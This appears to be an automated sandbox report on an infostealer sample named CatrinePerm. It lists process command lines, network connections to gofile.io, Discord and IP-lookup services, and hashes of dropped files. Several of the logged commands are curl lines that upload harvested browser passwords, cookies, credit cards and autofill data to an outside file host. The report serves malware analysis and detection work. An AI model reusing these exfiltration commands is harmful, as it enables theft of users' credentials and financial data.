C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3088 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile

C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe

"C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe" Taskmgr.exe

C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe

"C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe" explorer.exe

C:\Users\Admin\AppData\Roaming\Update.exe

C:\Users\Admin\AppData\Roaming\Update.exe

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"

C:\Users\Admin\AppData\Roaming\Win (3).exe

"C:\Users\Admin\AppData\Roaming\Win (3).exe"

C:\Users\Admin\AppData\Roaming\CatrinePerm.exe

"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile

C:\Users\Admin\AppData\Roaming\Update.exe

C:\Users\Admin\AppData\Roaming\Update.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 6.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
GB 92.123.128.133:443 www.bing.com tcp
US 8.8.8.8:53 133.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 gofile.io udp
FR 51.178.66.33:443 gofile.io tcp
FR 51.178.66.33:443 gofile.io tcp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 s.gofile.io udp
FR 51.75.242.210:443 s.gofile.io tcp
FR 51.75.242.210:443 s.gofile.io tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 210.242.75.51.in-addr.arpa udp
US 8.8.8.8:53 store5.gofile.io udp
FR 31.14.70.250:443 store5.gofile.io tcp
FR 31.14.70.250:443 store5.gofile.io tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
FR 31.14.70.250:443 store5.gofile.io tcp
US 8.8.8.8:53 250.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 rentry.co udp
US 104.21.95.148:443 rentry.co tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 148.95.21.104.in-addr.arpa udp
US 104.21.95.148:443 rentry.co tcp
US 104.21.95.148:443 rentry.co tcp
US 104.21.95.148:443 rentry.co tcp
US 104.21.95.148:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 textpubshiers.top udp
US 172.67.146.76:443 textpubshiers.top tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 76.146.67.172.in-addr.arpa udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 252.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 201.179.17.96.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
SE 78.69.106.17:8000 tcp
US 8.8.8.8:53 rentry.co udp
US 188.114.96.2:443 rentry.co tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 188.114.96.2:443 rentry.co tcp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 188.114.96.2:443 rentry.co tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 store1.gofile.io udp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 8.8.8.8:53 227.123.112.45.in-addr.arpa udp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
SE 78.69.106.17:8000 tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 checkip.amazonaws.com udp
SE 78.69.106.17:8000 tcp
IE 34.252.239.71:80 checkip.amazonaws.com tcp
US 172.67.146.76:443 textpubshiers.top tcp
US 8.8.8.8:53 71.239.252.34.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
US 188.114.96.2:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
FR 151.80.29.83:443 api.gofile.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
SE 78.69.106.17:8000 tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 edge.msiserver.lan udp
SE 78.69.106.17:8000 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a774512b00820b61a51258335097b2c9
SHA1 38c28d1ea3907a1af6c0443255ab610dd9285095
SHA256 01946a2d65e59b66ebc256470ff4861f32edee90a44e31bf67529add95cafef4
SHA512 ce109be65060a5e7a872707c6c2ccce3aacd577e59c59d6e23e78d03e3d502f2707713fda40a546ed332e41a56ef90297af99590a5ab02f686a58bcbf3a82da1

\??\pipe\LOCAL\crashpad_2192_YDLQTUUBHVNRHMYX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fd7944a4ff1be37517983ffaf5700b11
SHA1 c4287796d78e00969af85b7e16a2d04230961240
SHA256 b54b41e7ce5600bc653aa7c88abb666976872b2d5e2d657bfc1147a0b49e9d74
SHA512 28c58a2ccf39963a8d9f67ea5b93dbccf70b0109b2c8a396a58389cdec9db1205523a95730485bcbc9d533867cbf0e7167ad370fd45740e23656d01d96ee543b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 29ed269ef175af0550f5f675e933a7e5
SHA1 70c3b9af8b130bfd009fce429d9eda4a87d372ff
SHA256 111da147e556cd2eef99cb56d55974dadb2f5b4045550e2a63b0c2dee700b3b8
SHA512 5f6eee4c8486a843029632d8bc9e29654fb5cac23446bfa20f1cabd53f8d466c10dbf35e8a444102a779448e213b2d00eefe3605cbfaaec26d5d750c670887e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fed54abe92b2e2d6ce2e2ced704f03e1
SHA1 7946f39a194c2ff91de8cc369b6f0f060feba33e
SHA256 e0f3a0ba1d26506c2bf0976da0ba91a23d3f978c34b61464015476a38fd74ee3
SHA512 0a288549e747a6fd7e9fa3ad6be99c762c27a2e8a2506518d7f9188c724f7379be7f3de6e348867de8056df117bd22f58da6f448666340ab4f0313fc53d98fdf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f9c4a76a174bfb14e9e993fa6289e19f
SHA1 b0a4692fd9a911ce4c330a6db02f4811c9ca5204
SHA256 e285a0fccf1be8f01fb8071bd055a6a853baf6396c5747106d8cdca810ffec27
SHA512 0e4b3dbcfdba173f6f0ec13b2f2fdb2b86e32305a0bcc8c6ce309926f71538c4e247b5d240198b0d4842ce2741820761781586c14b0df8f73d3f99d5d9026d49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a79818debcca4bf07d37ce337ca05b7f
SHA1 db45dedd850f925af60d1c8bf0b108c98af05dbd
SHA256 28823ad8bf6e8f315e583b7029e97c32496f0ab6686779a19aebfeb1cea82cec
SHA512 b1e00b4038ee4bc59a7505b2aead6229a224716b5e53ad0b8c3c4fb5ef9107db19ed824d84a8781f17e9fc1d485bf857e8fbd111ec2c5cf6aed67a81b4181434

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 db14b8328f962dc93e24053c0c1a22dd
SHA1 31b105d214422a6c1f854d6164ce59f24dd7081f
SHA256 174e31faeeb4ef44e83fcbbe6950ba214b07f3a4ba9e15142c0f2e4aa03d4dde
SHA512 fcf0beb7ba47980e3d44c6570debc3e39ea77379f674adfd3bb037f3293c37890238598267518398f3fdfdce32053f8753d90da2e8b49216cb212696ddffd521

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0f7c11a8272eadcc5302f9f24dccba37
SHA1 7ee6940e7ff89c41a538ecc783c5fbcf06597e2d
SHA256 a638b5b60339d222c0f388768c9891a0ed893d34b8e6e1aa11719abb0a2fefc0
SHA512 93a4ee4899cde04321c6e6186c6b24220b9d90b28af2e28d34f279dc7016d1d08246cd26aff2a905b17a51a93e3222eb42142d062964999577c6d72cb21aab66

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5b37b28d6b2130e3c7b3b5f7c39a01d3
SHA1 c80a8ff01312c98e669e613bbcb6237a590bfc1d
SHA256 75b42a2f01f5e03a32dfcd8c8c7858f2bf91c8fcaa1bb9521342b424694622d3
SHA512 d85bb43df86a8e5d416f344b6000c848fed41a23d5cadcae5f4dbcb113de8d89f8137ee30f03c06a4143de19d81cc664553c3ab0edb955a14d705759acbea195

C:\Users\Admin\Downloads\CatrinePerm.rar

MD5 be9cedd5e971451825399d5deb204a0d
SHA1 7a05d714638ef1423da7418f71e45126010ce4ab
SHA256 5bde596c5dfbe136b65c0e34c38512a97c9222abd3bcffdefb8032375ec5489d
SHA512 98b93fe0c8a8388a517a5ed71098b54cdf854273f27803da2a139d3ea4ddc218d77a3df75f685db89c4011067f40d0b88fc29dcc5370c97352ca08233ecc1153

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Extension State\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Extension State\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Shared Dictionary\cache\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\GrShaderCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_1

MD5 a0a05fb0686d1acec29d34e283fd196a
SHA1 9b3f342179c9a4e11efd7ac46b8280a5a5c35963
SHA256 83770e59f56fced3438319cb1ceb7c2005e793589c7b35ddfb089120800e1436
SHA512 205bf28086b41d1a403c4abc968ce46d814b927615ad8e4503e579072057bc4a64ee81ba16781370c8621d2f16f8b1ccc985d2b5263186dd961292fc38270c89

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

MD5 29c66ded1b50b1c13a228d29d608d95c
SHA1 a242490eaf0b9e0bd71dbdae1f9d444afdeb8116
SHA256 40d15db264c001fff4948e4e8737b4733e88c1e8ac6d2a26b64f8c0eaa6c244b
SHA512 1d6bc7c4aa610439ab3dc995b06749283bda03c2acf41544a2d26efe9814ec7ed7819d55eb550436fd0c2964ab4e6748370fb6e00a954f4fd69a7fea30edfca8

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

MD5 c79315753f8eca50bc7281959725587a
SHA1 88b42c751c8aeeaf76b0b6bd3f266eff7f608b4a
SHA256 accc474815f0020bd89900dfe3cd7f52bd1c49cc6c69ee7470ff9e12e7699ed1
SHA512 03bb58aa39c14f55d39a7e42e39733e3645dfc884dc789d1d52cea74eb0dcfe63c2e282f19e26a9624eec6b57ecf143d0a224b9bf4f3bd45a4a10bec4d8bcac6

memory/5916-668-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5916-669-0x00000000003A0000-0x0000000000EDE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Win (3).exe

MD5 181a5e1c1238407657c399a6195e2a0f
SHA1 ed41ca6ba40433de12c93c5b7df9b3a5c4683017
SHA256 3260ef60eb7691ebc2741e24db06c644c30709c1d93efcac521b47e51c4f2446
SHA512 e0f1ee2de2ca7fb3354affe079318b54846c9afcfba9fe25b4ef17e7dac1b2e28dc3bc481c162cd9576ef58385ef9ebba5c5870f678d37cfb2d924f71d0155b3

C:\Users\Admin\AppData\Roaming\Win (3).exe

MD5 5f8136e9c87c5cd15107a16c93b2410e
SHA1 fd76478c14937669b96185ee1a79c171a9200fd4
SHA256 a53b3cc4736d3277de809b1f29243f80e62111ee445083719f50a217cd531d94
SHA512 131c358ea431f62e697decbf92024137db22ce8a8abec2791288d70eb2158487d5648b89a809a6287755a37f467ab319dc5c0f72f30372e3954b42c32ea06c83

C:\Users\Admin\AppData\Roaming\CatrinePerm.exe

MD5 10605ec186aacb6a4b3dde419cb0b5e5
SHA1 9c41040a4c238dec28c4f47bfb0a28a3cd4bf19d
SHA256 ca5b3ebffc2080fec7d44655069190b892e51e4bc4401c31f64a5a70d46f1ead
SHA512 1d48bbc5c965f098300ce5404269ea5b1694887531b9aa1e953755f631325946e4914405ae3cabfe13d222ddfde4b0368d446b9aad3956f345d6b142d6579a9d

C:\Users\Admin\AppData\Roaming\Win (3).exe

MD5 52da4b0958f918e69e41e524c0b0ebb4
SHA1 74296722e0653c640eec9f555f0c9042b3805799
SHA256 c1ab6c02354188c6e26b4feb5db7f7b6fa36719defa160b053937acd2ba4a745
SHA512 8a9040f4d8ae74151585713318b7235e5a162c5573ddc0389691d5f10d1aa15d8f6a6900235e597c8e291e87bdfc87addc36485eabab7f6755f1af4455d6ca5b

memory/5216-702-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5916-703-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5216-704-0x00000000002E0000-0x0000000000DF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

MD5 3eda75ddf0da931a8b305573d7508e8c
SHA1 d19618faac5e98152797aa94860725827dae4359
SHA256 c66e4c3be01e7830f7e564ce3139c774eed746c7db619b767e4f1f6e83c52cb9
SHA512 32d05e9c0fe66fee74d67ec20ea33b9332e5a077ef6e8ae26956e00fc839cdd9a840fcd944e33dd8655395588ab74e9768e1ea6210c234a0d60d14e560d544d0

memory/5420-716-0x0000000000B50000-0x0000000000B82000-memory.dmp

memory/5420-717-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a76d8ae9523bcf5bb2caa451121a0d91
SHA1 4867caa19f280aabdc4f85f6468335d70ad1d996
SHA256 515a528f05f0c708175813df2e149b0960d193bd4dac47a11a7641745c8a063b
SHA512 9dbab2a7c6ce09335a805a319399b95ad818c94153d57818cdf30cd26f825ab4517d15dca8bf4156a0aab5a24a6c06977ddb5f9d27f4be8f601a813dc88b9a57

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

MD5 b3aa2402a8f70a4ff6e85637bf82cef8
SHA1 afbe1b7c1b2eac15839c5cccb3410068d67331d3
SHA256 e0edba7789c5cc1738db332512ef2237bee9baff202306e887cab5e4cc69ada8
SHA512 45489f4645443761b553d4ebe212f1969be652783cb911f68234172eed32a573475c61883d239c4be2bd4246a03a135722c7149dc1e61262eff04ffd38b5a1f6

C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe

MD5 9dfb70a009d9a1696a1a55d17b0321a5
SHA1 0129fcc88ba5c5bb58e8cf0e8860b3b53dbec7a9
SHA256 4eba44c61669a2d7c77b7997846b0d779989d4fff31120caeca595887576c19b
SHA512 0f18f936de567c884d284cd00d9c5953c89865776ef3adc8e7c4de801dda4548c9d1998f222011ca66d567d64c2ad6bfd10050987ec216f9c14844edfb5c6d73

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

MD5 ae2901c87dc043f55ef4119d6582572d
SHA1 c0404a09b9fd17d71da19b6e6d228c765ebd0f63
SHA256 7115c28e5ba30c8a64ad4311bb924ddea53b89d7e3a5979319a27d2f2d1861ed
